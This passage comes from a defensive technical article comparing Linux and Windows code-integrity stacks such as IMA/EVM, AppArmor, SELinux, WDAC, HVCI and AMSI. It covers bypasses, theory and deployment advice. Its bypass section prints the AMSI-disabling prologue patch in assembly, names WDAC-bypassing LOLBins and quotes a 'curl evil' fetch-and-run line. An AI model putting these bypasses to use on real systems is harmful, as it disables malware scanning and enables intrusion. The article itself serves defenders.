WDAC's [policy rule reference](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/select-types-of-rules-to-create) defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary `.p7b` CIPolicy.

The same doc records the default-on audit-mode behaviour that has surprised many operators: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.

<Mermaid caption="WDAC policy evaluation. The Authenticode chain is parsed first; rule kinds are evaluated in priority order; bypass-list deny rules are normally added as a last-stop safety net.">
flowchart LR
  PE[PE load request] --> AC[Parse Authenticode signature]
  AC --> RM[Match rule set]
  RM --> P[Publisher / cert rule?]
  P -->|hit| AL[Allow]
  P -->|miss| H[Hash rule?]
  H -->|hit| AL
  H -->|miss| FP[FilePath rule?]
  FP -->|hit| AL
  FP -->|miss| MI[Managed Installer?]
  MI -->|hit| AL
  MI -->|miss| ISG[Intelligent Security Graph?]
  ISG -->|hit| AL
  ISG -->|miss| DEF[Default action]
  AL --> BL&#123,"In bypass-list deny?"&#125,
  BL -->|yes| BLK[Block]
  BL -->|no| LOAD[Loader continues]
  DEF --> BLK
</Mermaid>

### 6.2 Mandatory access control: AppArmor vs SELinux

| Dimension | AppArmor | SELinux |
|---|---|---|
| Model | Path-based allowlist per binary | Type-enforcement on subject x object x class |
| Storage of policy state | In-memory DFA loaded from user space | `security.selinux` xattr + compiled `policy.31` |
| Granularity | Profile per executable | Per-type, per-class, per-operation |
| Survives file rename | No (path is the identity) | Yes (xattr travels with inode) |
| Default-on distros | Ubuntu, openSUSE, SLES | RHEL, Fedora, Oracle Linux, Android, ChromeOS |
| Authoring tools | `aa-genprof`, `aa-logprof`, `aa-enforce` | `audit2allow`, `semodule`, refpolicy, `udica` |

[AppArmor's kernel documentation](https://docs.kernel.org/admin-guide/LSM/apparmor.html) describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

```
/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}
```

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the [Wikipedia summary](https://en.wikipedia.org/wiki/Security-Enhanced_Linux) calls Mandatory Access Control for multi-level security. [Smack](http://schaufler-ca.com/) is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.

<Aside label="fapolicyd as the userspace daemon path">
Red Hat's `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel's `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the [RHEL hardening guide](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/security_hardening/assembly_blocking-and-allowing-applications-using-fapolicyd_security-hardening), rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.
</Aside>

### 6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's [HVCI documentation](https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity) names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

<MarginNote>HVCI hardware prerequisites per the [OEM VBS guidance](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs): 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).</MarginNote>

### 6.4 Script-level inspection: AMSI vs Linux's gap

| Dimension | AMSI | Linux IMA on scripts |
|---|---|---|
| What it sees | Deobfuscated script buffer at execution time | Whole-file content at `open` or `mmap` |
| Coverage | PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge | Any file whose `func=FILE_CHECK` rule matches |
| Provider model | COM `IAntimalwareProvider` per process | None; kernel verifies signature directly |
| Defends against runtime obfuscation | Yes (sees final buffer) | No (sees file as written) |
| Trust boundary | Wrong (in-process; patchable by attacker) | Right (kernel-side; attacker cannot patch) |

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and `Invoke-Expression` evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what `bash -c "$(curl evil)"` will execute.

<Definition term="Constrained Language Mode">
The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.
</Definition>

### 6.5 Cloud reputation: Smart App Control

[Smart App Control](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/appcontrol) ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point introduced in Windows 11 version 22H2 to bring application control to home users. On every fresh install SAC starts in *evaluation* mode for 48 hours. Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC is not sufficient.

<Aside label="Smart App Control's 48-hour evaluation window">
Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no "restart evaluation" path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.
</Aside>

> **Note:** Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.

### 6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's `ioctl(FS_IOC_ENABLE_VERITY)` builds the Merkle tree, persists it next to the file, and switches the file to read-only. `FS_IOC_MEASURE_VERITY` returns the digest in constant time. IMA's policy language gained `appraise_type=sigv3` and the `digest_type=verity` modifier so a rule like

```
appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity
```

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

## 7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

### The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, `amsiInitFailed` flag flip, library unload -- have all been answered by partial mitigations. Microsoft has [hardened AMSI provider loading](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to `amsi.dll`. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip `AmsiUtils.amsiInitFailed`. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

<PullQuote>
The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in.
</PullQuote>

<Spoiler kind="solution" label="What the canonical AMSI patch looks like in x64 assembly">
The simplest in-memory patch overwrites `AmsiScanBuffer`'s prologue with a six-byte sequence that loads `AMSI_RESULT_CLEAN` (0) into EAX and returns:

```
xor eax, eax    ; 31 C0
ret             ; C3
```

or, depending on the calling convention the patcher targets:

```
mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3
```

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.
</Spoiler>

### The WDAC LOLBin arms race

Microsoft's [App Control bypass list](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol) is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include `mshta.exe`, `wscript.exe`, `cscript.exe`, `msbuild.exe`, `Microsoft.Build.dll`, `windbg.exe`, `cdb.exe`, `kd.exe`, `dotnet.exe`, `csi.exe`, `rcsi.exe`, `addinprocess.exe`, `addinutil.exe`, `aspnet_compiler.exe`, `bash.exe`, `wsl.exe`, `runscripthelper.exe`, `system.management.automation.dll`, and `webclnt.dll` / `davsvc.dll`. The community [LOLBAS index](https://lolbas-project.github.io/) widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's `ConfigCI` PowerShell module, `CiTool.exe`) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.

<Definition term="LOLBin (Living-Off-the-Land Binary)">
A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.
</Definition>

### fapolicyd permissive-window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over `fanotify`) showing its operational seam. A privileged operator who sets `permissive=1` to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

### IMA / EVM offline-key attacks

EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid `security.evm` HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

### The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

| Bypass class | Linux instance | Windows instance | Root cause | Partial mitigation |
|---|---|---|---|---|
| Verifier shares address space with attacker | (script interpreters; no in-kernel interpreter scanner) | AMSI prologue patch, `amsiInitFailed` flag flip | Software-only protection of an in-process secret is impossible | ETW patch detection, signed providers, Constrained Language Mode |
| Trust grant coarser than exploit unit | RPM trust pre-fapolicyd integrity-mode addition | WDAC Publisher rules + LOLBins | Trust algebra cannot express "Microsoft except mshta" with one rule | Hash-level denies, growing block list |
| Reference value reachable by attacker | IMA without EVM | (HVCI moved the kernel verifier out of reach) | Reference value next to the file under attacker control | EVM HMAC sealed to TPM PCR |
| Verifier is killable | fapolicyd daemon failure | (HVCI verifier is hypervisor-isolated) | Verifier liveness is part of the trust assumption | TPM-sealed boot policy + kernel-mode fallback |

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both rows of pivots is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

## 8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

### Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an *allowlist* of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

### No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.

### No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous `mmap` followed by `mprotect(PROT_EXEC)` all produce executable bytes that did not exist on disk and were never hashed.

The [IPE documentation](https://docs.kernel.org/admin-guide/LSM/ipe.html) lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.

<Sidenote>The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's `--module-path` and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.</Sidenote>

### Cryptographic bounds

The cryptographic side, by contrast, is closed.

- Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.
- A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. **fs-verity matches this lower bound.**
- Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.

So on the *crypto* side the gap between upper and lower bounds is closed. On the *policy-expressiveness* side there is no "best" policy because the right policy depends on threat model. There is no Pareto frontier; there are only trade-offs.

| Bound | What it says | Mechanism that matches it | Remaining gap |
|---|---|---|---|
| Rice's theorem | "Is this binary malicious?" is undecidable | Every CI stack is an allowlist + signer model | Allowlist composition is itself a policy problem |
| In-process secret | No purely-software defence inside the attacker's address space | HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM | AMSI design violates this; the gap is structural |
| Hash verification | $\Omega(n)$ per full read; $O(\log n)$ per partial read | fs-verity per page; IMA cached on `i_iversion` | Cold-cache cost remains O(n) for non-fs-verity files |
| JIT and dynamic code | No way to verify code that did not exist on disk | None | Restricted-runtime modes (CLM, AppContainer) are the best partial answer |
| Asymmetric verify | About 60-300 us per RSA-2048 or Ed25519 verify on modern x86 | Authenticode catalogues amortise; IMA caches in inode | Cold cache is the only sensitive case |

> **Key idea:** Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

## 9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

### Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file `imasig` signature on every `open` is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the `digest_cache` LSM in [version 3 of the patchset, posted in February 2024](https://lore.kernel.org/linux-integrity/20240209140917.846878-1-roberto.sassu@huaweicloud.com/) and covered on [LWN](https://lwn.net/Articles/961591/). The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a `digest_cache_lookup()` primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.

By v6 in [November 2024](https://lore.kernel.org/linux-integrity/20241119104922.2772571-1-roberto.sassu@huaweicloud.com/) the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the [linux-integrity list](https://lore.kernel.org/linux-integrity/?q=digest_cache+LSM); memory safety of the TLV parser was verified with the [Frama-C](https://frama-c.com/) static analyser. As of late 2024 the work is not yet upstream.

<PullQuote>
"Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024
</PullQuote>

The important framing correction: the Integrity Digest Cache is **not** a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

### Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every `AmsiScanBuffer` call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

### Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (`ima_template_fmt`) and [Windows Measured Boot](/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/)'s [WBCL](https://trustedcomputinggroup.org/resource/canonical-event-log-format/) both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

| Problem | Current best partial result | Upstream status |
|---|---|---|
| IMA appraisal scale on RPM-signed distros | Integrity Digest Cache, 45-65% appraisal speedup | Patchset v6 (Nov 2024); not upstream |
| AMSI in-process trust boundary | Signed provider DLLs, ETW patch detection, CLM | Partial; structural fix would be OOP broker |
| Linux script-content scanning | Nothing in production | Open |
| Cross-OS attestation interop | TCG CEL, TDX/SEV-SNP quotes | Platform-layer; workload-level still split |
| WDAC LOLBin treadmill | Microsoft block list + LOLBAS + WDAC Wizard | Operational; structural fix unknown |

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore **operational**, not technological.

## 10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

| If you need... | On Linux, use... | On Windows, use... |
|---|---|---|
| TPM-backed remote attestation | IMA + EVM (TPM PCR 10) | Measured Boot + TPM PCR 11 + HVCI |
| Block unsigned drivers | `module.sig_enforce=1` plus kernel module signing | HVCI (Memory Integrity) |
| Cryptographic allowlist of installed software | fapolicyd (RPM/DEB trust) | App Control with Publisher rules |
| Per-app sandbox | AppArmor or SELinux | AppContainer or App Control (no direct equivalent) |
| Catch in-memory PowerShell payloads | (no direct equivalent) | AMSI |
| Consumer-grade reputation gating | (no direct equivalent) | Smart App Control |
| Immutable appliance image | dm-verity + IPE | App Control with hash rules + HVCI |
| Large APK-style assets verified lazily | fs-verity | (no direct equivalent) |

The why behind each row.

**TPM-backed attestation.** On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.

**Blocking unsigned drivers.** Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

**Application allowlisting on general-purpose distributions.** This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

**Per-app sandboxing.** Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; [AppContainer](/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/) or Microsoft Defender Attack Surface Reduction rules are the substitutes.

**In-memory PowerShell payloads.** AMSI's use case. Linux has nothing equivalent in production.

**Consumer reputation gating.** Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

**Immutable appliance images.** Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.

**Large lazy-loaded assets.** Fs-verity territory; Windows has no public equivalent.

### Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

- **IMA without EVM and without a TPM-sealed key is decorative.** Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
- **AppArmor profiles authored in *complain* mode never get promoted to *enforce*.** Schedule a config-management pass that runs `aa-enforce` on the profiles you actually want to confine.
- **SELinux `setenforce 0` for debugging that becomes permanent.** The `/.autorelabel` flag is required after restoring contexts; track that you flipped it.
- **fapolicyd permissive-mode lapses.** Set up alerting on `permissive=1` in the runtime configuration; treat the daemon's exit status as a security event.
- **WDAC's `Enabled:Audit Mode` policy-rule option is on by default.** Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is *off* before declaring rollout complete.
- **HVCI without a driver-compatibility check.** Microsoft's `DG_Readiness_Tool` and the HVCI compatibility report belong in every pilot. Vendors that allocate RWX kernel pages will fail HVCI loading and leave the host unbootable.
- **Treating AMSI as a control.** It is telemetry. Budget for the bypass on day one.
- **Smart App Control disable is one-way.** A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.

> **Note:** On Linux: enable IMA in `measure` mode before `appraise`; deploy AppArmor / SELinux profiles in *complain* / *permissive* before *enforce*; run fapolicyd with `permissive=1` for the first deploy. On Windows: leave WDAC's `Enabled:Audit Mode` set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.

> **Note:** A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed-xattr xattrs, IMA appraisal is mostly a check-box. fapolicyd with `integrity=ima` may be a saner starting point on machines without TPM.

<FAQ title="Frequently asked questions">

<FAQItem question="Should I enable IMA appraise mode on a general-purpose Linux server?">
Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.
</FAQItem>

<FAQItem question="Why does AppArmor work for me when SELinux gave me headaches?">
Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.
</FAQItem>

<FAQItem question="Can I block all LOLBins with one WDAC policy?">
No. Microsoft's [block list](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol) grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.
</FAQItem>

<FAQItem question="Is AMSI worth enabling if it is bypassable?">
Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.
</FAQItem>

<FAQItem question="Does HVCI hurt my battery life or performance?">
On CPUs with [Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer)](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs), the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim.
</FAQItem>

<FAQItem question="Will Smart App Control work on my Windows 11 enterprise laptop?">
Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.
</FAQItem>

</FAQ>

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

<StudyGuide slug="linux-ima-apparmor-vs-wdac-amsi-code-integrity-lineages" keyTerms={[
  { term: "IMA", definition: "Linux Integrity Measurement Architecture. Hashes files at LSM hook points; can measure (record into TPM PCR 10), appraise (block on mismatch), or audit." },
  { term: "EVM", definition: "Extended Verification Module. HMACs (or signs) the security xattrs IMA depends on, so an offline attacker who rewrites security.ima cannot also forge security.evm." },
  { term: "AppArmor", definition: "Path-based Linux MAC, merged to mainline in 2.6.36 (Oct 2010). Default on Ubuntu and SUSE. Profiles are loaded from user space and compiled to in-kernel DFAs." },
  { term: "SELinux", definition: "Label-based Linux MAC merged to mainline in 2.6.0 (Dec 2003). Default on RHEL, Fedora, Oracle Linux, Android. Type-enforcement on subject x object x class." },
  { term: "fapolicyd", definition: "Red Hat userspace allowlister sitting on the fanotify permission channel. Trust inherited from the RPM database; rules in /etc/fapolicyd/rules.d/." },
  { term: "fs-verity", definition: "Per-file Merkle-tree authenticity, Linux 5.4 (Nov 2019). O(log n) per-page verification; constant-time digest retrieval; supported on ext4, f2fs, btrfs." },
  { term: "IPE", definition: "Integrity Policy Enforcement, Linux 6.12 (Nov 2024). Property-based decisions: dm-verity root hash, fs-verity digest, initramfs origin. O(1) per access." },
  { term: "WDAC / App Control", definition: "Windows code-integrity policy mechanism, originally Device Guard (Windows 10 1507). Signed XML compiled to .p7b, evaluated at PE load. Renamed App Control for Business in 2024." },
  { term: "HVCI / Memory Integrity", definition: "Hypervisor-Protected Code Integrity. Kernel-mode CI check moved into VTL1 of Hyper-V, isolated from the VTL0 normal kernel. Same mechanism marketed under three names." },
  { term: "AMSI", definition: "Antimalware Scan Interface. In-process script-broker COM API (AmsiScanBuffer) called by PowerShell, WSH, VBA, MSHTA, UAC installer, .NET. Provider is Defender by default." },
  { term: "Smart App Control", definition: "Consumer-facing pre-baked WDAC policy shipped with Windows 11 22H2. 48-hour evaluation window, one-way disable, cloud reputation via the Intelligent Security Graph." },
  { term: "LSM", definition: "Linux Security Modules. Kernel framework merged Dec 2003 that hosts security modules at well-defined hook points. Hosts SELinux, AppArmor, IMA, EVM, IPE, BPF LSM, Landlock." },
  { term: "MAC", definition: "Mandatory Access Control. Kernel-enforced policy layer above DAC that no userspace privilege can override; the operator, not the file owner, sets policy." },
  { term: "TPM PCR 10", definition: "The TPM Platform Configuration Register IMA extends file-content hashes into. Monotonic, extendable as PCR_new = SHA256(PCR_old || hash); used as the anchor for remote attestation." },
  { term: "Authenticode", definition: "Microsoft's PE signing format. Anchors WDAC's Publisher, PcaCertificate, and LeafCertificate rule kinds; signed catalogues (.cat) provide pre-computed hashes for catalogued files." },
